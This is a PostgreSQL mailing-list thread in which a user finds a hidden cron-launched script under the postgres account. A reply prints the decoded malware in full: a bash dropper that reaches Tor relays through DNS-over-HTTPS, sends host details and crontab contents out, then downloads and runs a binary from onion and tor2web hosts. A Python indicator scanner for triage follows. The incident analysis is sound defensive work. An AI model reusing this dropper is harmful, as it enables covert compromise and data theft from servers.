Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

From: Ebubekir Büyüktosun <ebubekir(dot)buyuktosun(at)primeit(dot)com(dot)tr>
To: Antonis Christodoulou <christan305(at)hotmail(dot)com>
Cc: Ahmet Demir <dbademir(at)gmail(dot)com>, Tom Lane <tgl(at)sss(dot)pgh(dot)pa(dot)us>, Rob Sargent <robjsargent(at)gmail(dot)com>, "pgsql-general(at)lists(dot)postgresql(dot)org" <pgsql-general(at)lists(dot)postgresql(dot)org>, Matthias Apitz <guru(at)unixarea(dot)de>
Subject: Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours
Date: 2023-01-02 08:54:53
Message-ID: 567411672649367@mail.yandex.com.tr
Lists: pgsql-general

Hey Antonis,

If you decode the below Base64 code, you will see the following bash script that is tried to execute on your machine;

    x8C8W8llVk0Rzccy9N0ggCOI2VBAc
    exec &>/dev/null
    export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

    d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
    c=$(echo "curl -4fsSLkA- -m200")
    t=$(echo "4iucigxvlfx4vcqn5sordersaa3a3ztjcaoszptxxo5b3pbn6nlwsfad")

    sockz() {
    n=(dns.twnic.tw doh-ch.blahdns.com doh-de.blahdns.com doh-fi.blahdns.com doh-jp.blahdns.com doh.li doh.pub doh-sg.blahdns.com fi.doh.dns.snopyta.org dns.digitalsize.net)
    p=$(echo "dns-query?name=relay.tor2socks.in")
    q=${n[$((RANDOM%${#n[(at)]}))]}
    s=$($c https://$q/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|tail -1)
    }

    fexe() {
    for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
    }

    u() {
    sockz
    f=/int.$(uname -m)
    x=./$(date|md5sum|cut -f1 -d-)
    r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
    $c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
    chmod +x $x;$x;rm -f $x
    }

    for h in tor2web.in tor2web.it
    do
    if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
    fexe;u $t.$h
    ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
    ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
    else
    break
    fi
    done

02.01.2023, 11:37, "Antonis Christodoulou" <christan305(at)hotmail(dot)com>:
> Hey Matthias, here it is:
>
> christan(at)vultr:~$ sudo cat /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh
> #!/bin/bash
> exec &>/dev/null
> echo x8C8W8llVk0Rzccy9N0ggCOI2VBAc
> echo [base64 payload removed from the archive]|base64 -d|bash
>
>> On 2 Jan 2023, at 9:46 AM, Matthias Apitz <guru(at)unixarea(dot)de> wrote:
>>
>> On Monday, January 02, 2023 at 08:53:32 a.m. +0200, Antonis Christodoulou wrote:
>>> And for the record, Ahmet, here's a weird cron job:
>>>
>>> christan(at)vultr:~$ sudo crontab -l -u postgres
>>> 13 * * * * /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &
>>>
>>> Had no idea somebody can add something like this externally...
>>
>> Please post the content of this script.
>>
>> matthias
>>
>> --
>> Matthias Apitz, ✉ guru(at)unixarea(dot)de, http://www.unixarea.de/ +49-176-38902045
>> Public GnuPG key: http://www.unixarea.de/key.pub

Have a good day
Best Regards
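The following triage helper is an added example, not part of the thread or of any project: it checks crontab entries and script contents against the indicators visible in this thread (a hidden `.systemd-private-*.sh` under the postgres home, a `base64 -d | bash` decode-and-run chain, output silenced with `exec &>/dev/null`, the `/tmp/.X11-unix/01` pid marker, and Tor/tor2web downloads). The sample crontab, wrapper script and stage-2 fragment are constructed from what the thread shows.

```python
import re

# Indicator patterns taken from the script shown in the thread.
INDICATORS = {
    "hidden_script_in_pg_home": re.compile(r"/var/lib/postgresql/\.[^\s]+\.sh"),
    "base64_decode_to_shell": re.compile(r"base64\s+-d\s*\|\s*(ba)?sh\b"),
    "output_silenced": re.compile(r"exec\s*&>\s*/dev/null"),
    "x11_pid_marker": re.compile(r"/tmp/\.X11-unix/01\b"),
    "tor_download": re.compile(r"\.onion\b|socks5h://|tor2web\.", re.I),
}


def scan_text(text):
    """Return the sorted names of indicators found anywhere in the text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_crontab(crontab):
    """Return (line, indicators) for every non-comment crontab line that
    matches at least one indicator; benign entries are left out."""
    hits = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        found = scan_text(line)
        if found:
            hits.append((line, found))
    return hits


# Constructed sample: the entry from the thread plus a benign maintenance job.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/vacuumdb --all --analyze
13 * * * * /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &
"""

# Constructed sample of the wrapper script (payload text elided, as in the thread).
SAMPLE_WRAPPER = "#!/bin/bash\nexec &>/dev/null\necho <base64 payload>|base64 -d|bash\n"

# Constructed fragment of the decoded stage: pid-marker check and Tor fetch.
SAMPLE_STAGE2 = ("if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then\n"
                 "$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r\nfi\n")

if __name__ == "__main__":
    for line, found in scan_crontab(SAMPLE_CRONTAB):
        print("suspicious cron entry:", line, found)
    print("wrapper indicators:", scan_text(SAMPLE_WRAPPER))
    print("stage-2 indicators:", scan_text(SAMPLE_STAGE2))
```

On a live host the same functions can be fed the output of `crontab -l -u postgres` and the contents of any script it references.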
